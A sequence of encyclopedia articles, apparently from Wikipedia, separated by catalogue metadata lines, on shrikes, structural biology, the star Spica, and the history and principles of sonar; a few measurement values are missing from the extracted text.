Shrikes () are passerine birds of the family Laniidae. The family is composed of 34 species in two genera. The family name, and that of the larger genus, Lanius, is derived from the Latin word for "butcher", and some shrikes are also known as butcherbirds because of the habit, particularly of males, of impaling prey onto plant spines within their territories. These larders have multiple functions, attracting females and serving as food stores. The common English name shrike is from Old English , alluding to the shrike's shriek-like call. Taxonomy The family Laniidae was introduced (as the subfamily Lanidia) in 1815 by the French polymath Constantine Samuel Rafinesque. The type genus Lanius had been introduced by Carl Linnaeus in 1758. As currently constituted, the family contains 34 species in four genera. It includes the genus Eurocephalus with the two white-crowned shrikes. A molecular phylogenetic study published in 2023 found that the white-crowned shrikes were more closely related to the crows in the family Corvidae than they are to the Laniidae and authors proposed that the genus Eurocephalus should be moved to its own family Eurocephalidae. The cladogram below is based on these results: Distribution, migration, and habitat Most shrike species have a Eurasian and African distribution, with just two breeding in North America (the loggerhead and northern shrikes). No members of this family occur in South America or Australia, although one species reaches New Guinea. The shrikes vary in the extent of their ranges: some species, such as the great grey shrike, ranging across the Northern Hemisphere, while the São Tomé fiscal (or Newton's fiscal) is restricted to the island of São Tomé. They inhabit open habitats, especially steppe and savannah. A few species of shrikes are forest dwellers, seldom occurring in open habitats. Some species breed in northern latitudes during the summer, then migrate to warmer climes for the winter. Description Shrikes are medium-sized birds with grey, brown, or black-and-white plumage. Most species are between and in size; however, the genus Corvinella, with its extremely elongated tail-feathers, may reach up to in length. Their beaks are hooked, like those of a bird of prey, reflecting their carnivorous nature; their calls are strident. Behaviour Male shrikes are known for their habit of catching insects and small vertebrates and impaling them on thorns, branches, the spikes on barbed-wire fences, or any available sharp point. These stores serve as a cache so that the shrike can return to the uneaten portions at a later time. The primary function of conspicuously impaling prey on thorny vegetation is however thought to be for males to display their fitness and the quality of the territory held to prospective mates. The impaling behaviour increases during the onset of the breeding season. Female shrikes have been known to impale prey, but primarily to assist in dismembering prey. This behaviour may also serve secondarily as an adaptation to eating the toxic lubber grasshopper, Romalea microptera. The bird waits 1–2 days for the toxins within the grasshopper to degrade before eating it. Loggerhead shrikes kill vertebrates by using their beaks to grab or pierce the neck and violently shake their prey. Shrikes are territorial, and these territories are defended from other pairs. In migratory species, a breeding territory is defended in the breeding grounds and a smaller feeding territory is established during migration and in the wintering grounds. Where several species of shrikes exist together, competition for territories can be intense. Shrikes make regular use of exposed perch sites, where they adopt a conspicuous upright stance. These sites are used to watch for prey and to advertise their presence to rivals. Shrikes vocally imitate their prey to lure them for capture. In 1575, this was noted by the English poet George Turberville.She will stand at perch upon some tree or poste, and there make an exceedingly lamentable crye. . . . All to make other fowles to thinke that she is very much distressed. . . whereupon the credulous sellie birds do flocke together at her call. If any happen to approach near her, she. . . ceazeth on them, and devoureth them (ungrateful subtill fowle). Breeding Shrikes are generally monogamous breeders, although polygyny has been recorded in some species. Co-operative breeding, where younger birds help their parents raise the next generation of young, has been recorded in both species in the genera Eurocephalus and Corvinella, as well as one species of Lanius. Males attract females to their territory with well-stocked caches, which may include inedible but brightly coloured items. During courtship, the male performs a ritualised dance which includes actions that mimic the skewering of prey on thorns, and feeds the female. Shrikes make simple, cup-shaped nests from twigs and grasses, in bushes and the lower branches of trees. Species in taxonomic order FAMILY: LANIIDAE
Biology and health sciences
Corvoidea
null
29400
https://en.wikipedia.org/wiki/Structural%20biology
Structural biology
Structural biology, as defined by the Journal of Structural Biology, deals with structural analysis of living material (formed, composed of, and/or maintained and refined by living cells) at every level of organization. Early structural biologists throughout the 19th and early 20th centuries were primarily only able to study structures to the limit of the naked eye's visual acuity and through magnifying glasses and light microscopes. In the 20th century, a variety of experimental techniques were developed to examine the 3D structures of biological molecules. The most prominent techniques are X-ray crystallography, nuclear magnetic resonance, and electron microscopy. Through the discovery of X-rays and its applications to protein crystals, structural biology was revolutionized, as now scientists could obtain the three-dimensional structures of biological molecules in atomic detail. Likewise, NMR spectroscopy allowed information about protein structure and dynamics to be obtained. Finally, in the 21st century, electron microscopy also saw a drastic revolution with the development of more coherent electron sources, aberration correction for electron microscopes, and reconstruction software that enabled the successful implementation of high resolution cryo-electron microscopy, thereby permitting the study of individual proteins and molecular complexes in three-dimensions at angstrom resolution. With the development of these three techniques, the field of structural biology expanded and also became a branch of molecular biology, biochemistry, and biophysics concerned with the molecular structure of biological macromolecules (especially proteins, made up of amino acids, RNA or DNA, made up of nucleotides, and membranes, made up of lipids), how they acquire the structures they have, and how alterations in their structures affect their function. This subject is of great interest to biologists because macromolecules carry out most of the functions of cells, and it is only by coiling into specific three-dimensional shapes that they are able to perform these functions. This architecture, the "tertiary structure" of molecules, depends in a complicated way on each molecule's basic composition, or "primary structure." At lower resolutions, tools such as FIB-SEM tomography have allowed for greater understanding of cells and their organelles in 3-dimensions, and how each hierarchical level of various extracellular matrices contributes to function (for example in bone). In the past few years it has also become possible to predict highly accurate physical molecular models to complement the experimental study of biological structures. Computational techniques such as molecular dynamics simulations can be used in conjunction with empirical structure determination strategies to extend and study protein structure, conformation and function. History In 1912 Max Von Laue directed X-rays at crystallized copper sulfate generating a diffraction pattern. These experiments led to the development of X-ray crystallography, and its usage in exploring biological structures. In 1951, Rosalind Franklin and Maurice Wilkins used X-ray diffraction patterns to capture the first image of deoxyribonucleic acid (DNA). Francis Crick and James Watson modeled the double helical structure of DNA using this same technique in 1953 and received the Nobel Prize in Medicine along with Wilkins in 1962. Pepsin crystals were the first proteins to be crystallized for use in X-ray diffraction, by Theodore Svedberg who received the 1962 Nobel Prize in Chemistry. The first tertiary protein structure, that of myoglobin, was published in 1958 by John Kendrew. During this time, modeling of protein structures was done using balsa wood or wire models. With the invention of modeling software such as CCP4 in the late 1970s, modeling is now done with computer assistance. Recent developments in the field have included the generation of X-ray free electron lasers, allowing analysis of the dynamics and motion of biological molecules, and the use of structural biology in assisting synthetic biology. In the late 1930s and early 1940s, the combination of work done by Isidor Rabi, Felix Bloch, and Edward Mills Purcell led to the development of nuclear magnetic resonance (NMR). Currently, solid-state NMR is widely used in the field of structural biology to determine the structure and dynamic nature of proteins (protein NMR). In 1990, Richard Henderson produced the first three-dimensional, high resolution image of bacteriorhodopsin using cryogenic electron microscopy (cryo-EM). Since then, cryo-EM has emerged as an increasingly popular technique to determine three-dimensional, high resolution structures of biological images. More recently, computational methods have been developed to model and study biological structures. For example, molecular dynamics (MD) is commonly used to analyze the dynamic movements of biological molecules. In 1975, the first simulation of a biological folding process using MD was published in Nature. Recently, protein structure prediction was significantly improved by a new machine learning method called AlphaFold. Some claim that computational approaches are starting to lead the field of structural biology research. Techniques Biomolecules are too small to see in detail even with the most advanced light microscopes. The methods that structural biologists use to determine their structures generally involve measurements on vast numbers of identical molecules at the same time. These methods include: Mass spectrometry Macromolecular crystallography Neutron diffraction Proteolysis Nuclear magnetic resonance spectroscopy of proteins (NMR) Electron paramagnetic resonance (EPR) Cryogenic electron microscopy (cryoEM) Electron crystallography and microcrystal electron diffraction Multiangle light scattering Small angle scattering Ultrafast laser spectroscopy Anisotropic terahertz microspectroscopy Two-dimensional infrared spectroscopy Dual-polarization interferometry and circular dichroism Most often researchers use them to study the "native states" of macromolecules. But variations on these methods are also used to watch nascent or denatured molecules assume or reassume their native states. See protein folding. A third approach that structural biologists take to understanding structure is bioinformatics to look for patterns among the diverse sequences that give rise to particular shapes. Researchers often can deduce aspects of the structure of integral membrane proteins based on the membrane topology predicted by hydrophobicity analysis. See protein structure prediction. Applications Structural biologists have made significant contributions towards understanding the molecular components and mechanisms underlying human diseases. For example, cryo-EM and ssNMR have been used to study the aggregation of amyloid fibrils, which are associated with Alzheimer's disease, Parkinson's disease, and type II diabetes. In addition to amyloid proteins, scientists have used cryo-EM to produce high resolution models of tau filaments in the brain of Alzheimer's patients which may help develop better treatments in the future. Structural biology tools can also be used to explain interactions between pathogens and hosts. For example, structural biology tools have enabled virologists to understand how the HIV envelope allows the virus to evade human immune responses. Structural biology is also an important component of drug discovery. Scientists can identify targets using genomics, study those targets using structural biology, and develop drugs that are suited for those targets. Specifically, ligand-NMR, mass spectrometry, and X-ray crystallography are commonly used techniques in the drug discovery process. For example, researchers have used structural biology to better understand Met, a protein encoded by a protooncogene that is an important drug target in cancer. Similar research has been conducted for HIV targets to treat people with AIDS. Researchers are also developing new antimicrobials for mycobacterial infections using structure-driven drug discovery.
Biology and health sciences
Biochemistry
Biology
29409
https://en.wikipedia.org/wiki/Spica
Spica
Spica is the brightest object in the constellation of Virgo and one of the 20 brightest stars in the night sky. It has the Bayer designation α Virginis, which is Latinised to Alpha Virginis and abbreviated Alpha Vir or α Vir. Analysis of its parallax shows that it is located 250 light-years from the Sun. It is a spectroscopic binary star and rotating ellipsoidal variable; a system whose two stars are so close together they are egg-shaped rather than spherical, and can only be separated by their spectra. The primary is a blue giant and a variable star of the Beta Cephei type. Spica, along with Arcturus and Denebola—or Regulus, depending on the source—forms the Spring Triangle asterism, and, by extension, is also part of the Great Diamond together with the star Cor Caroli. Nomenclature In 2016, the International Astronomical Union organized a Working Group on Star Names (WGSN) to catalog and standardize proper names for stars. The WGSN's first bulletin of July 2016 included a table of the first two batches of names approved by the WGSN; which included Spica for this star. It is now so entered in the IAU Catalog of Star Names. The name is derived from the Latin spīca virginis "the virgin's ear of [wheat] grain". It was also anglicized as Virgin's Spike. α Virginis (Latinised to Alpha Virginis) is the system's Bayer designation. Johann Bayer cited the name Arista. Other traditional names are Azimech , from Arabic السماك الأعزل al-simāk al-ʼaʽzal 'the unarmed simāk (of unknown meaning, cf. Eta Boötis); Alarph, Arabic for 'the grape-gatherer' or 'gleaner', and Sumbalet (Sombalet, Sembalet and variants), from Arabic سنبلة sunbulah "ear of grain". In Chinese, (), meaning Horn (asterism), refers to an asterism consisting of Spica and ζ Virginis. Consequently, the Chinese name for Spica is (, ). In Hindu astronomy, Spica corresponds to the Nakshatra Chitrā. Observational history As one of the nearest massive binary star systems to the Sun, Spica has been the subject of many observational studies. Spica is believed to be the star that gave Hipparchus the data that led him to discover the precession of the equinoxes. A temple to Menat (an early Hathor) at Thebes was oriented with reference to Spica when it was built in 3200 BC, and, over time, precession slowly but noticeably changed Spica's location relative to the temple. Nicolaus Copernicus made many observations of Spica with his home-made triquetrum for his researches on precession. Observation Spica is 2.06 degrees from the ecliptic and can be occulted by the Moon and sometimes by planets. The last planetary occultation of Spica occurred when Venus passed in front of the star (as seen from Earth) on November 10, 1783. The next occultation will occur on September 2, 2197, when Venus again passes in front of Spica. The Sun passes a little more than 2° north of Spica around October 16 every year, and the star's heliacal rising occurs about two weeks later. Every 8 years, Venus passes Spica around the time of the star's heliacal rising, as in 2009 when it passed 3.5° north of the star on November 3. A method of finding Spica is to follow the arc of the handle of the Big Dipper (or Plough) to Arcturus, and then continue on the same angular distance to Spica. This can be recalled by the mnemonic phrase, "arc to Arcturus and spike to Spica." Stars that can set (not in a circumpolar constellation for the viewer) culminate at midnight—noticeable where viewed away from any polar region experiencing midnight sun—when at opposition, meaning they can be viewed from dusk until dawn. This applies to α Virginis on 12 April, in the current astronomical epoch. Physical properties Spica is a close binary star whose components orbit each other every four days. They stay close enough together that they cannot be resolved as two stars through a telescope. The changes in the orbital motion of this pair results in a Doppler shift in the absorption lines of their respective spectra, making them a double-lined spectroscopic binary. Initially, the orbital parameters for this system were inferred using spectroscopic measurements. Between 1966 and 1970, the Narrabri Stellar Intensity Interferometer was used to observe the pair and to directly measure the orbital characteristics and the angular diameter of the primary, which was found to be , and the angular size of the semi-major axis of the orbit was found to be only slightly larger at . Spica is a rotating ellipsoidal variable, which is a non-eclipsing close binary star system where the stars are mutually distorted through their gravitational interaction. This effect causes the apparent magnitude of the star system to vary by 0.03 over an interval that matches the orbital period. This slight dip in magnitude is barely noticeable visually. Both stars rotate faster than their mutual orbital period. This lack of synchronization and the high ellipticity of their orbit may indicate that this is a young star system. Over time, the mutual tidal interaction of the pair may lead to rotational synchronization and orbit circularization. Spica is a polarimetric variable, first discovered to be such in 2016. The majority of the polarimetric signal is the result of the reflection of the light from one star off the other (and vice versa). The two stars in Spica were the first ever to have their reflectivity (or geometric albedo) measured. The geometric albedos of Spica A and B are, respectively, 3.61 percent and 1.36 percent, values that are low compared to planets. The MK spectral classification of Spica is typically considered to be an early B-type main-sequence star. Individual spectral types for the two components are difficult to assign accurately, especially for the secondary due to the Struve–Sahade effect. The Bright Star Catalogue derived a spectral class of B2III-IV for the primary and B4-7V for the secondary, but later studies have given various different values. The primary star has a stellar classification of B2III-IV. The luminosity class matches the spectrum of a star that is midway between a subgiant and a giant star, and it is no longer a main-sequence star. The evolutionary stage has been calculated to be near or slightly past the end of the main-sequence phase. This is a massive star with more than 10 times the mass of the Sun and seven times its radius. The bolometric luminosity of the primary is about 20,500 times that of the Sun, and nine times the luminosity of its companion. The primary is one of the nearest stars to the Sun that has enough mass to end its life in a Type II supernova explosion. However, since Spica has only recently left the main sequence, this event is not likely to occur for several more million years. The primary is classified as a Beta Cephei variable star that varies in brightness over a 0.1738-day period. The spectrum shows a radial velocity variation with the same period, indicating that the surface of the star is regularly pulsating outward and then contracting. This star is rotating rapidly, with a rotational velocity of 199 km/s along the equator. The secondary member of this system is one of the few stars whose spectrum is affected by the Struve–Sahade effect. This is an anomalous change in the strength of the spectral lines over the course of an orbit, where the lines become weaker as the star is moving away from the observer. It may be caused by a strong stellar wind from the primary scattering the light from secondary when it is receding. This star is smaller than the primary, with about 4 times the mass of the Sun and 3.6 times the Sun's radius. Its stellar classification is B4-7 V, making this a main-sequence star. In culture Both a rocket and crew capsule designed and under development by Copenhagen Suborbitals, a crowd-funded space program, is named Spica. Spica aims to make Denmark the first country to launch its own astronaut to space after Russia, the US and China. Spica is one of the Behenian fixed stars. In his Three Books of Occult Philosophy, Cornelius Agrippa attributes Spica's kabbalistic symbol to Hermes Trismegistus.
Physical sciences
Notable stars
Astronomy
29438
https://en.wikipedia.org/wiki/Sonar
Sonar
Sonar (sound navigation and ranging or sonic navigation and ranging) is a technique that uses sound propagation (usually underwater, as in submarine navigation) to navigate, measure distances (ranging), communicate with or detect objects on or under the surface of the water, such as other vessels. "Sonar" can refer to one of two types of technology: passive sonar means listening for the sound made by vessels; active sonar means emitting pulses of sounds and listening for echoes. Sonar may be used as a means of acoustic location and of measurement of the echo characteristics of "targets" in the water. Acoustic location in air was used before the introduction of radar. Sonar may also be used for robot navigation, and sodar (an upward-looking in-air sonar) is used for atmospheric investigations. The term sonar is also used for the equipment used to generate and receive the sound. The acoustic frequencies used in sonar systems vary from very low (infrasonic) to extremely high (ultrasonic). The study of underwater sound is known as underwater acoustics or hydroacoustics. The first recorded use of the technique was in 1490 by Leonardo da Vinci, who used a tube inserted into the water to detect vessels by ear. It was developed during World War I to counter the growing threat of submarine warfare, with an operational passive sonar system in use by 1918. Modern active sonar systems use an acoustic transducer to generate a sound wave which is reflected from target objects. History Although some animals (dolphins, bats, some shrews, and others) have used sound for communication and object detection for millions of years, use by humans in the water was initially recorded by Leonardo da Vinci in 1490: a tube inserted into the water was said to be used to detect vessels by placing an ear to the tube. In the late 19th century, an underwater bell was used as an ancillary to lighthouses or lightships to provide warning of hazards. The use of sound to "echo-locate" underwater in the same way as bats use sound for aerial navigation seems to have been prompted by the disaster of 1912. The world's first patent for an underwater echo-ranging device was filed at the British Patent Office by English meteorologist Lewis Fry Richardson a month after the sinking of Titanic, and a German physicist Alexander Behm obtained a patent for an echo sounder in 1913. The Canadian engineer Reginald Fessenden, while working for the Submarine Signal Company in Boston, Massachusetts, built an experimental system beginning in 1912, a system later tested in Boston Harbor, and finally in 1914 from the U.S. Revenue Cutter Miami on the Grand Banks off Newfoundland. In that test, Fessenden demonstrated depth sounding, underwater communications (Morse code) and echo ranging (detecting an iceberg at a range). The "Fessenden oscillator", operated at about 500 Hz frequency, was unable to determine the bearing of the iceberg due to the 3-metre wavelength and the small dimension of the transducer's radiating face (less than wavelength in diameter). The ten Montreal-built British H-class submarines launched in 1915 were equipped with Fessenden oscillators. During World War I the need to detect submarines prompted more research into the use of sound. The British made early use of underwater listening devices called hydrophones, while the French physicist Paul Langevin, working with a Russian immigrant electrical engineer Constantin Chilowsky, worked on the development of active sound devices for detecting submarines in 1915. Although piezoelectric and magnetostrictive transducers later superseded the electrostatic transducers they used, this work influenced future designs. Lightweight sound-sensitive plastic film and fibre optics have been used for hydrophones, while Terfenol-D and lead magnesium niobate (PMN) have been developed for projectors. ASDIC In 1916, under the British Board of Invention and Research, Canadian physicist Robert William Boyle took on the active sound detection project with A. B. Wood, producing a prototype for testing in mid-1917. This work for the Anti-Submarine Division of the British Naval Staff was undertaken in utmost secrecy, and used quartz piezoelectric crystals to produce the world's first practical underwater active sound detection apparatus. To maintain secrecy, no mention of sound experimentation or quartz was made – the word used to describe the early work ("supersonics") was changed to "ASD"ics, and the quartz material to : "ASD" for "Anti-Submarine Division", hence the British acronym ASDIC. In 1939, in response to a question from the Oxford English Dictionary, the Admiralty made up the story that it stood for "Allied Submarine Detection Investigation Committee", and this is still widely believed, though no committee bearing this name has been found in the Admiralty archives. By 1918, Britain and France had built prototype active systems. The British tested their ASDIC on in 1920 and started production in 1922. The 6th Destroyer Flotilla had ASDIC-equipped vessels in 1923. An anti-submarine school HMS Osprey and a training flotilla of four vessels were established on Portland in 1924. By the outbreak of World War II, the Royal Navy had five sets for different surface ship classes, and others for submarines, incorporated into a complete anti-submarine system. The effectiveness of early ASDIC was hampered by the use of the depth charge as an anti-submarine weapon. This required an attacking vessel to pass over a submerged contact before dropping charges over the stern, resulting in a loss of ASDIC contact in the moments leading up to attack. The hunter was effectively firing blind, during which time a submarine commander could take evasive action. This situation was remedied with new tactics and new weapons. The tactical improvements developed by Frederic John Walker included the creeping attack. Two anti-submarine ships were needed for this (usually sloops or corvettes). The "directing ship" tracked the target submarine on ASDIC from a position about 1500 to 2000 yards behind the submarine. The second ship, with her ASDIC turned off and running at 5 knots, started an attack from a position between the directing ship and the target. This attack was controlled by radio telephone from the directing ship, based on their ASDIC and the range (by rangefinder) and bearing of the attacking ship. As soon as the depth charges had been released, the attacking ship left the immediate area at full speed. The directing ship then entered the target area and also released a pattern of depth charges. The low speed of the approach meant the submarine could not predict when depth charges were going to be released. Any evasive action was detected by the directing ship and steering orders to the attacking ship given accordingly. The low speed of the attack had the advantage that the German acoustic torpedo was not effective against a warship travelling so slowly. A variation of the creeping attack was the "plaster" attack, in which three attacking ships working in a close line abreast were directed over the target by the directing ship. The new weapons to deal with the ASDIC blind spot were "ahead-throwing weapons", such as Hedgehogs and later Squids, which projected warheads at a target ahead of the attacker and still in ASDIC contact. These allowed a single escort to make better aimed attacks on submarines. Developments during the war resulted in British ASDIC sets that used several different shapes of beam, continuously covering blind spots. Later, acoustic torpedoes were used. Early in World War II (September 1940), British ASDIC technology was transferred for free to the United States. Research on ASDIC and underwater sound was expanded in the UK and in the US. Many new types of military sound detection were developed. These included sonobuoys, first developed by the British in 1944 under the codename High Tea, dipping/dunking sonar and mine-detection sonar. This work formed the basis for post-war developments related to countering the nuclear submarine. SONAR During the 1930s American engineers developed their own underwater sound-detection technology, and important discoveries were made, such as the existence of thermoclines and their effects on sound waves. Americans began to use the term SONAR for their systems, coined by Frederick Hunt to be the equivalent of RADAR. US Navy Underwater Sound Laboratory In 1917, the US Navy acquired J. Warren Horton's services for the first time. On leave from Bell Labs, he served the government as a technical expert, first at the experimental station at Nahant, Massachusetts, and later at US Naval Headquarters, in London, England. At Nahant he applied the newly developed vacuum tube, then associated with the formative stages of the field of applied science now known as electronics, to the detection of underwater signals. As a result, the carbon button microphone, which had been used in earlier detection equipment, was replaced by the precursor of the modern hydrophone. Also during this period, he experimented with methods for towing detection. This was due to the increased sensitivity of his device. The principles are still used in modern towed sonar systems. To meet the defense needs of Great Britain, he was sent to England to install in the Irish Sea bottom-mounted hydrophones connected to a shore listening post by submarine cable. While this equipment was being loaded on the cable-laying vessel, World War I ended and Horton returned home. During World War II, he continued to develop sonar systems that could detect submarines, mines, and torpedoes. He published Fundamentals of Sonar in 1957 as chief research consultant at the US Navy Underwater Sound Laboratory. He held this position until 1959 when he became technical director, a position he held until mandatory retirement in 1963. Materials and designs in the US and Japan There was little progress in US sonar from 1915 to 1940. In 1940, US sonars typically consisted of a magnetostrictive transducer and an array of nickel tubes connected to a 1-foot-diameter steel plate attached back-to-back to a Rochelle salt crystal in a spherical housing. This assembly penetrated the ship hull and was manually rotated to the desired angle. The piezoelectric Rochelle salt crystal had better parameters, but the magnetostrictive unit was much more reliable. High losses to US merchant supply shipping early in World War II led to large scale high priority US research in the field, pursuing both improvements in magnetostrictive transducer parameters and Rochelle salt reliability. Ammonium dihydrogen phosphate (ADP), a superior alternative, was found as a replacement for Rochelle salt; the first application was a replacement of the 24 kHz Rochelle-salt transducers. Within nine months, Rochelle salt was obsolete. The ADP manufacturing facility grew from few dozen personnel in early 1940 to several thousands in 1942. One of the earliest application of ADP crystals were hydrophones for acoustic mines; the crystals were specified for low-frequency cutoff at 5 Hz, withstanding mechanical shock for deployment from aircraft from , and ability to survive neighbouring mine explosions. One of key features of ADP reliability is its zero aging characteristics; the crystal keeps its parameters even over prolonged storage. Another application was for acoustic homing torpedoes. Two pairs of directional hydrophones were mounted on the torpedo nose, in the horizontal and vertical plane; the difference signals from the pairs were used to steer the torpedo left-right and up-down. A countermeasure was developed: the targeted submarine discharged an effervescent chemical, and the torpedo went after the noisier fizzy decoy. The counter-countermeasure was a torpedo with active sonar – a transducer was added to the torpedo nose, and the microphones were listening for its reflected periodic tone bursts. The transducers comprised identical rectangular crystal plates arranged to diamond-shaped areas in staggered rows. Passive sonar arrays for submarines were developed from ADP crystals. Several crystal assemblies were arranged in a steel tube, vacuum-filled with castor oil, and sealed. The tubes then were mounted in parallel arrays. The standard US Navy scanning sonar at the end of World War II operated at 18 kHz, using an array of ADP crystals. Desired longer range, however, required use of lower frequencies. The required dimensions were too big for ADP crystals, so in the early 1950s magnetostrictive and barium titanate piezoelectric systems were developed, but these had problems achieving uniform impedance characteristics, and the beam pattern suffered. Barium titanate was then replaced with more stable lead zirconate titanate (PZT), and the frequency was lowered to 5 kHz. The US fleet used this material in the AN/SQS-23 sonar for several decades. The SQS-23 sonar first used magnetostrictive nickel transducers, but these weighed several tons, and nickel was expensive and considered a critical material; piezoelectric transducers were therefore substituted. The sonar was a large array of 432 individual transducers. At first, the transducers were unreliable, showing mechanical and electrical failures and deteriorating soon after installation; they were also produced by several vendors, had different designs, and their characteristics were different enough to impair the array's performance. The policy to allow repair of individual transducers was then sacrificed, and "expendable modular design", sealed non-repairable modules, was chosen instead, eliminating the problem with seals and other extraneous mechanical parts. The Imperial Japanese Navy at the onset of World War II used projectors based on quartz. These were big and heavy, especially if designed for lower frequencies; the one for Type 91 set, operating at 9 kHz, had a diameter of and was driven by an oscillator with 5 kW power and 7 kV of output amplitude. The Type 93 projectors consisted of solid sandwiches of quartz, assembled into spherical cast iron bodies. The Type 93 sonars were later replaced with Type 3, which followed German design and used magnetostrictive projectors; the projectors consisted of two rectangular identical independent units in a cast-iron rectangular body about . The exposed area was half the wavelength wide and three wavelengths high. The magnetostrictive cores were made from 4 mm stampings of nickel, and later of an iron-aluminium alloy with aluminium content between 12.7% and 12.9%. The power was provided from a 2 kW at 3.8 kV, with polarization from a 20 V, 8 A DC source. The passive hydrophones of the Imperial Japanese Navy were based on moving-coil design, Rochelle salt piezo transducers, and carbon microphones. Later developments in transducers Magnetostrictive transducers were pursued after World War II as an alternative to piezoelectric ones. Nickel scroll-wound ring transducers were used for high-power low-frequency operations, with size up to in diameter, probably the largest individual sonar transducers ever. The advantage of metals is their high tensile strength and low input electrical impedance, but they have electrical losses and lower coupling coefficient than PZT, whose tensile strength can be increased by prestressing. Other materials were also tried; nonmetallic ferrites were promising for their low electrical conductivity resulting in low eddy current losses, Metglas offered high coupling coefficient, but they were inferior to PZT overall. In the 1970s, compounds of rare earths and iron were discovered with superior magnetomechanic properties, namely the Terfenol-D alloy. This made possible new designs, e.g. a hybrid magnetostrictive-piezoelectric transducer. The most recent of these improved magnetostrictive materials is Galfenol. Other types of transducers include variable-reluctance (or moving-armature, or electromagnetic) transducers, where magnetic force acts on the surfaces of gaps, and moving coil (or electrodynamic) transducers, similar to conventional speakers; the latter are used in underwater sound calibration, due to their very low resonance frequencies and flat broadband characteristics above them. Active sonar Active sonar uses a sound transmitter (or projector) and a receiver. When the two are in the same place it is monostatic operation. When the transmitter and receiver are separated it is bistatic operation. When more transmitters (or more receivers) are used, again spatially separated, it is multistatic operation. Most sonars are used monostatically with the same array often being used for transmission and reception. Active sonobuoy fields may be operated multistatically. Active sonar creates a pulse of sound, often called a "ping", and then listens for reflections (echo) of the pulse. This pulse of sound is generally created electronically using a sonar projector consisting of a signal generator, power amplifier and electro-acoustic transducer/array. A transducer is a device that can transmit and receive acoustic signals ("pings"). A beamformer is usually employed to concentrate the acoustic power into a beam, which may be swept to cover the required search angles. Generally, the electro-acoustic transducers are of the Tonpilz type and their design may be optimised to achieve maximum efficiency over the widest bandwidth, in order to optimise performance of the overall system. Occasionally, the acoustic pulse may be created by other means, e.g. chemically using explosives, airguns or plasma sound sources. To measure the distance to an object, the time from transmission of a pulse to reception is measured and converted into a range using the known speed of sound. To measure the bearing, several hydrophones are used, and the set measures the relative arrival time to each, or with an array of hydrophones, by measuring the relative amplitude in beams formed through a process called beamforming. Use of an array reduces the spatial response so that to provide wide cover multibeam systems are used. The target signal (if present) together with noise is then passed through various forms of signal processing, which for simple sonars may be just energy measurement. It is then presented to some form of decision device that calls the output either the required signal or noise. This decision device may be an operator with headphones or a display, or in more sophisticated sonars this function may be carried out by software. Further processes may be carried out to classify the target and localise it, as well as measuring its velocity. The pulse may be at constant frequency or a chirp of changing frequency (to allow pulse compression on reception). Simple sonars generally use the former with a filter wide enough to cover possible Doppler changes due to target movement, while more complex ones generally include the latter technique. Since digital processing became available pulse compression has usually been implemented using digital correlation techniques. Military sonars often have multiple beams to provide all-round cover while simple ones only cover a narrow arc, although the beam may be rotated, relatively slowly, by mechanical scanning. Particularly when single frequency transmissions are used, the Doppler effect can be used to measure the radial speed of a target. The difference in frequency between the transmitted and received signal is measured and converted into a velocity. Since Doppler shifts can be introduced by either receiver or target motion, allowance has to be made for the radial speed of the searching platform. One useful small sonar is similar in appearance to a waterproof flashlight. The head is pointed into the water, a button is pressed, and the device displays the distance to the target. Another variant is a "fishfinder" that shows a small display with shoals of fish. Some civilian sonars (which are not designed for stealth) approach active military sonars in capability, with three-dimensional displays of the area near the boat. When active sonar is used to measure the distance from the transducer to the bottom, it is known as echo sounding. Similar methods may be used looking upward for wave measurement. Active sonar is also used to measure distance through water between two sonar transducers or a combination of a hydrophone (underwater acoustic microphone) and projector (underwater acoustic speaker). When a hydrophone/transducer receives a specific interrogation signal it responds by transmitting a specific reply signal. To measure distance, one transducer/projector transmits an interrogation signal and measures the time between this transmission and the receipt of the other transducer/hydrophone reply. The time difference, scaled by the speed of sound through water and divided by two, is the distance between the two platforms. This technique, when used with multiple transducers/hydrophones/projectors, can calculate the relative positions of static and moving objects in water. In combat situations, an active pulse can be detected by an enemy and will reveal a submarine's position at twice the maximum distance that the submarine can itself detect a contact and give clues as to the submarine's identity based on the characteristics of the outgoing ping. For these reasons, active sonar is not frequently used by military submarines. A very directional, but low-efficiency, type of sonar (used by fisheries, military, and for port security) makes use of a complex nonlinear feature of water known as non-linear sonar, the virtual transducer being known as a parametric array. Project Artemis Project Artemis was an experimental research and development project in the late 1950s to mid 1960s to examine acoustic propagation and signal processing for a low-frequency active sonar system that might be used for ocean surveillance. A secondary objective was examination of engineering problems of fixed active bottom systems. The receiving array was located on the slope of Plantagnet Bank off Bermuda. The active source array was deployed from the converted World War II tanker . Elements of Artemis were used experimentally after the main experiment was terminated. Transponder This is an active sonar device that receives a specific stimulus and immediately (or with a delay) retransmits the received signal or a predetermined one. Transponders can be used to remotely activate or recover subsea equipment. Performance prediction A sonar target is small relative to the sphere, centred around the emitter, on which it is located. Therefore, the power of the reflected signal is very low, several orders of magnitude less than the original signal. Even if the reflected signal was of the same power, the following example (using hypothetical values) shows the problem: Suppose a sonar system is capable of emitting a 10,000 W/m2 signal at 1 m, and detecting a 0.001 W/m2 signal. At 100 m the signal will be 1 W/m2 (due to the inverse-square law). If the entire signal is reflected from a 10 m2 target, it will be at 0.001 W/m2 when it reaches the emitter, i.e. just detectable. However, the original signal will remain above 0.001 W/m2 until 3000 m. Any 10 m2 target between 100 and 3000 m using a similar or better system would be able to detect the pulse, but would not be detected by the emitter. The detectors must be very sensitive to pick up the echoes. Since the original signal is much more powerful, it can be detected many times further than twice the range of the sonar (as in the example). Active sonar have two performance limitations: due to noise and reverberation. In general, one or other of these will dominate, so that the two effects can be initially considered separately. In noise-limited conditions at initial detection: SL − 2PL + TS − (NL − AG) = DT, where SL is the source level, PL is the propagation loss (sometimes referred to as transmission loss), TS is the target strength, NL is the noise level, AG is the array gain of the receiving array (sometimes approximated by its directivity index) and DT is the detection threshold. In reverberation-limited conditions at initial detection (neglecting array gain): SL − 2PL + TS = RL + DT, where RL is the reverberation level, and the other factors are as before. Hand-held sonar for use by a diver The LIMIS (limpet mine imaging sonar) is a hand-held or ROV-mounted imaging sonar for use by a diver. Its name is because it was designed for patrol divers (combat frogmen or clearance divers) to look for limpet mines in low visibility water. The LUIS (lensing underwater imaging system) is another imaging sonar for use by a diver. There is or was a small flashlight-shaped handheld sonar for divers, that merely displays range. For the INSS (integrated navigation sonar system) Upward looking sonar An upward looking sonar (ULS) is a sonar device pointed upwards looking towards the surface of the sea. It is used for similar purposes as downward looking sonar, but has some unique applications such as measuring sea ice thickness, roughness and concentration, or measuring air entrainment from bubble plumes during rough seas. Often it is moored on the bottom of the ocean or floats on a taut line mooring at a constant depth of perhaps 100 m. 